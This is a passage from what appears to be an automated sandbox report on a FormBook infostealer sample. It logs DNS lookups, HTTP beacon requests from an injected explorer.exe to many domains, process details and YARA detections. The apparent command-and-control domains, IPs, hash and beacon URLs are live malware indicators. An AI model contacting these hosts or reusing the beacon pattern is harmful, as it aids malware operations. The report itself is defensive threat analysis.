                                          Oct 3, 2021 09:58:45.025994062 CEST5917253192.168.2.48.8.8.8
                                          Oct 3, 2021 09:58:46.039237976 CEST5917253192.168.2.48.8.8.8
                                          Oct 3, 2021 09:58:47.039262056 CEST5917253192.168.2.48.8.8.8
                                          Oct 3, 2021 09:58:47.554116964 CEST53591728.8.8.8192.168.2.4
                                          Oct 3, 2021 09:58:48.465555906 CEST53591728.8.8.8192.168.2.4
                                          Oct 3, 2021 09:58:48.560878038 CEST6242053192.168.2.48.8.8.8
                                          Oct 3, 2021 09:58:48.587464094 CEST53624208.8.8.8192.168.2.4
                                          Oct 3, 2021 09:58:49.467149019 CEST53591728.8.8.8192.168.2.4
                                          Oct 3, 2021 09:58:52.571595907 CEST6057953192.168.2.48.8.8.8
                                          Oct 3, 2021 09:58:53.570835114 CEST6057953192.168.2.48.8.8.8
                                          Oct 3, 2021 09:58:54.089746952 CEST53605798.8.8.8192.168.2.4
                                          Oct 3, 2021 09:58:55.417242050 CEST53605798.8.8.8192.168.2.4
                                          Oct 3, 2021 09:58:59.104794979 CEST5018353192.168.2.48.8.8.8
                                          Oct 3, 2021 09:58:59.208343029 CEST53501838.8.8.8192.168.2.4

                                          ICMP Packets

                                          TimestampSource IPDest IPChecksumCodeType
                                          Oct 3, 2021 09:57:54.111169100 CEST192.168.2.48.8.8.8cff5(Port unreachable)Destination Unreachable
                                          Oct 3, 2021 09:58:48.465643883 CEST192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Oct 3, 2021 09:58:49.467228889 CEST192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Oct 3, 2021 09:58:55.417361975 CEST192.168.2.48.8.8.8cff2(Port unreachable)Destination Unreachable

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Oct 3, 2021 09:57:38.683191061 CEST192.168.2.48.8.8.80xdd18Standard query (0)www.agora.marketsA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:43.724562883 CEST192.168.2.48.8.8.80xb85Standard query (0)www.hartfulcleaning.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:48.912702084 CEST192.168.2.48.8.8.80xc3bcStandard query (0)www.sakuratyu.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:49.955838919 CEST192.168.2.48.8.8.80xc3bcStandard query (0)www.sakuratyu.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:50.971491098 CEST192.168.2.48.8.8.80xc3bcStandard query (0)www.sakuratyu.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:57.379009962 CEST192.168.2.48.8.8.80x7aafStandard query (0)www.qumpan.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:02.466120005 CEST192.168.2.48.8.8.80x4d57Standard query (0)www.2ed58fwec.xyzA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:08.503768921 CEST192.168.2.48.8.8.80xcd7bStandard query (0)www.factechcolombia.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:18.691266060 CEST192.168.2.48.8.8.80x60daStandard query (0)www.sakina.digitalA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:23.776633024 CEST192.168.2.48.8.8.80x8b5fStandard query (0)www.ninetofivetheses.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:28.948040962 CEST192.168.2.48.8.8.80x383Standard query (0)www.privatelymeeting.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:34.054457903 CEST192.168.2.48.8.8.80xa84eStandard query (0)www.anamentor.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:39.134401083 CEST192.168.2.48.8.8.80xd27cStandard query (0)www.zoonseo.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:45.025994062 CEST192.168.2.48.8.8.80xce18Standard query (0)www.noordinarybusiness.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:46.039237976 CEST192.168.2.48.8.8.80xce18Standard query (0)www.noordinarybusiness.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:47.039262056 CEST192.168.2.48.8.8.80xce18Standard query (0)www.noordinarybusiness.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:52.571595907 CEST192.168.2.48.8.8.80x3870Standard query (0)www.njhude.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:53.570835114 CEST192.168.2.48.8.8.80x3870Standard query (0)www.njhude.comA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:59.104794979 CEST192.168.2.48.8.8.80x2f17Standard query (0)www.modernmpm.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Oct 3, 2021 09:56:21.463624001 CEST8.8.8.8192.168.2.40xd38bNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                          Oct 3, 2021 09:57:38.708153963 CEST8.8.8.8192.168.2.40xdd18Name error (3)www.agora.marketsnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST8.8.8.8192.168.2.40xb85No error (0)www.hartfulcleaning.comwww65.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST8.8.8.8192.168.2.40xb85No error (0)www65.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST8.8.8.8192.168.2.40xb85No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST8.8.8.8192.168.2.40xb85No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Oct 3, 2021 09:57:43.765558004 CEST8.8.8.8192.168.2.40xb85No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:52.341748953 CEST8.8.8.8192.168.2.40xc3bcServer failure (2)www.sakuratyu.comnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:54.111011982 CEST8.8.8.8192.168.2.40xc3bcServer failure (2)www.sakuratyu.comnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:54.357109070 CEST8.8.8.8192.168.2.40xc3bcServer failure (2)www.sakuratyu.comnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:57:57.399893999 CEST8.8.8.8192.168.2.40x7aafNo error (0)www.qumpan.com46.38.243.234A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:02.794513941 CEST8.8.8.8192.168.2.40x4d57No error (0)www.2ed58fwec.xyz156.225.2.209A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:08.539320946 CEST8.8.8.8192.168.2.40xcd7bNo error (0)www.factechcolombia.comfactechcolombia.comCNAME (Canonical name)IN (0x0001)
                                          Oct 3, 2021 09:58:08.539320946 CEST8.8.8.8192.168.2.40xcd7bNo error (0)factechcolombia.com81.88.48.71A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:18.714468002 CEST8.8.8.8192.168.2.40x60daNo error (0)www.sakina.digitalsakina.digitalCNAME (Canonical name)IN (0x0001)
                                          Oct 3, 2021 09:58:18.714468002 CEST8.8.8.8192.168.2.40x60daNo error (0)sakina.digital81.169.145.74A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:23.796281099 CEST8.8.8.8192.168.2.40x8b5fNo error (0)www.ninetofivetheses.comninetofivetheses.comCNAME (Canonical name)IN (0x0001)
                                          Oct 3, 2021 09:58:23.796281099 CEST8.8.8.8192.168.2.40x8b5fNo error (0)ninetofivetheses.com34.102.136.180A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:28.992896080 CEST8.8.8.8192.168.2.40x383No error (0)www.privatelymeeting.com213.186.33.5A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:34.075911045 CEST8.8.8.8192.168.2.40xa84eNo error (0)www.anamentor.com104.21.51.95A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:34.075911045 CEST8.8.8.8192.168.2.40xa84eNo error (0)www.anamentor.com172.67.178.31A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:39.307363987 CEST8.8.8.8192.168.2.40xd27cNo error (0)www.zoonseo.com173.231.37.12A (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:47.554116964 CEST8.8.8.8192.168.2.40xce18Server failure (2)www.noordinarybusiness.comnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:48.465555906 CEST8.8.8.8192.168.2.40xce18Server failure (2)www.noordinarybusiness.comnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:49.467149019 CEST8.8.8.8192.168.2.40xce18Server failure (2)www.noordinarybusiness.comnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:54.089746952 CEST8.8.8.8192.168.2.40x3870Server failure (2)www.njhude.comnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:55.417242050 CEST8.8.8.8192.168.2.40x3870Server failure (2)www.njhude.comnonenoneA (IP address)IN (0x0001)
                                          Oct 3, 2021 09:58:59.208343029 CEST8.8.8.8192.168.2.40x2f17No error (0)www.modernmpm.com199.59.242.153A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.hartfulcleaning.com
                                          • www.qumpan.com
                                          • www.2ed58fwec.xyz
                                          • www.factechcolombia.com
                                          • www.sakina.digital
                                          • www.ninetofivetheses.com
                                          • www.privatelymeeting.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.44981535.246.6.10980C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 3, 2021 09:57:43.803239107 CEST8110OUTGET /shjn/?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3 HTTP/1.1
                                          Host: www.hartfulcleaning.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:57:43.903879881 CEST8111INHTTP/1.1 301 Moved Permanently
                                          Date: Sun, 03 Oct 2021 07:57:43 GMT
                                          Content-Length: 0
                                          Connection: close
                                          location: https://www.hartfulcleaning.com/shjn?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3
                                          strict-transport-security: max-age=120
                                          x-wix-request-id: 1633247863.819246588398126726
                                          Age: 0
                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVh8VTPOV0MzZjJizkRQ/qjD,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRaltZvo+9TobxsT5eVCdjGCQw1L1DUQeOVBnHJjDsALjW9C5pgEgJzARPPe1194hBnp6ONazVZfmanRIUStwnThmc=,2UNV7KOq4oGjA5+PKsX47DroW4/3ETklcOkoKiqVN25YgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,m7d0zj9X6FBqkyAIyh66vErLMFr5x66tSJCN7L0bVuJNG+KuK+VIZfbNzHJu0vJu,k4IrXgMmYJ2VF1cp9wAw77VG8YCN6gshiXCVhknPuz4D/Bm8UpHKg9klDMJbTqmHWIHlCalF7YnfvOr2cMPpyw==
                                          Cache-Control: no-cache
                                          X-Content-Type-Options: nosniff
                                          Server: Pepyaka/1.19.10


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.44982446.38.243.23480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 3, 2021 09:57:57.425302982 CEST8913OUTGET /shjn/?BZXds2=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABxMbWmFo1f&jlW=5jIhet3 HTTP/1.1
                                          Host: www.qumpan.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:57:57.448713064 CEST8913INHTTP/1.1 404 Not Found
                                          Date: Sun, 03 Oct 2021 07:56:54 GMT
                                          Server: Apache/2.4.10 (Debian)
                                          Content-Length: 276
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 71 75 6d 70 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.qumpan.com Port 80</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.449827156.225.2.20980C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 3, 2021 09:58:03.137198925 CEST8997OUTGET /shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet3 HTTP/1.1
                                          Host: www.2ed58fwec.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:03.475264072 CEST8997INHTTP/1.1 302 Redirect
                                          Content-Type: text/html; charset=UTF-8
                                          Location: https://www.2ed58fwec.xyz/shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet3
                                          Server: Microsoft-IIS/8.5
                                          X-Powered-By: ASP.NET
                                          Date: Sun, 03 Oct 2021 07:57:58 GMT
                                          Connection: close
                                          Content-Length: 246
                                          Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 32 65 64 35 38 66 77 65 63 2e 78 79 7a 2f 73 68 6a 6e 2f 3f 42 5a 58 64 73 32 3d 43 6e 45 5a 47 67 70 36 44 42 42 2b 70 44 6e 4f 75 49 69 78 47 70 58 41 70 2b 56 4d 56 70 4c 75 65 52 49 68 47 42 34 51 57 64 35 37 47 59 6f 64 2b 53 77 42 44 4e 49 45 4f 4c 49 34 62 4e 38 6e 63 77 70 39 26 61 6d 70 3b 6a 6c 57 3d 35 6a 49 68 65 74 33 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
                                          Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://www.2ed58fwec.xyz/shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&amp;jlW=5jIhet3"></a></body>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.44982881.88.48.7180C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 3, 2021 09:58:08.583885908 CEST8999OUTGET /shjn/?BZXds2=q+IOPKcWAF8HOZaSc4cEUEu5wE6+kd2dEtRaCxRabbawa99LvN+eX182jK5p9vZ8QaPu&jlW=5jIhet3 HTTP/1.1
                                          Host: www.factechcolombia.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:08.634010077 CEST8999INHTTP/1.1 404 Not Found
                                          Date: Sun, 03 Oct 2021 07:58:08 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 6a 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shjn/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.44984081.169.145.7480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 3, 2021 09:58:18.735333920 CEST9038OUTGET /shjn/?BZXds2=U4D/9jyl4LwInOaHPL1dM7FXipfOkLnA1xY1V+vBJ7elQfZSHChwpT42Icw9AFkuQMKq&jlW=5jIhet3 HTTP/1.1
                                          Host: www.sakina.digital
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:18.762326956 CEST9038INHTTP/1.1 404 Not Found
                                          Date: Sun, 03 Oct 2021 07:58:18 GMT
                                          Server: Apache/2.4.49 (Unix)
                                          Content-Length: 196
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.44984434.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 3, 2021 09:58:23.816284895 CEST9050OUTGET /shjn/?BZXds2=DRu3/33A+HP1NRfSxdp3iuQBFZZLKD7J2S+jM/VNqTCHnWN0FA+Y+jnmu1WXSKeywE4Q&jlW=5jIhet3 HTTP/1.1
                                          Host: www.ninetofivetheses.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:23.928077936 CEST9050INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Sun, 03 Oct 2021 07:58:23 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "615764fb-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.449845213.186.33.580C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 3, 2021 09:58:29.019432068 CEST9051OUTGET /shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3 HTTP/1.1
                                          Host: www.privatelymeeting.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 3, 2021 09:58:29.046505928 CEST9052INHTTP/1.1 301 Moved Permanently
                                          server: nginx
                                          date: Sun, 03 Oct 2021 07:58:29 GMT
                                          content-type: text/html
                                          content-length: 162
                                          location: https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3
                                          x-iplb-request-id: 66818F39:C2B5_D5BA2105:0050_615962A5_2A4BC799:CEDD
                                          x-iplb-instance: 16976
                                          set-cookie: SERVERID77446=200172|YVliq|YVliq; path=/; HttpOnly
                                          cache-control: private
                                          connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: OApfyh3Vfm.exe PID: 6332 Parent PID: 5944

                                          General

                                          Start time:09:56:26
                                          Start date:03/10/2021
                                          Path:C:\Users\user\Desktop\OApfyh3Vfm.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\OApfyh3Vfm.exe'
                                          Imagebase:0x290000
                                          File size:536576 bytes
                                          MD5 hash:015D157C73A9A51F0A3745A028D3ABCE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: OApfyh3Vfm.exe PID: 2908 Parent PID: 6332

                                          General

                                          Start time:09:56:30
                                          Start date:03/10/2021
                                          Path:C:\Users\user\Desktop\OApfyh3Vfm.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\OApfyh3Vfm.exe
                                          Imagebase:0x620000
                                          File size:536576 bytes
                                          MD5 hash:015D157C73A9A51F0A3745A028D3ABCE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 2908

                                          General

                                          Start time:09:56:31
                                          Start date:03/10/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, Author: Joe Security
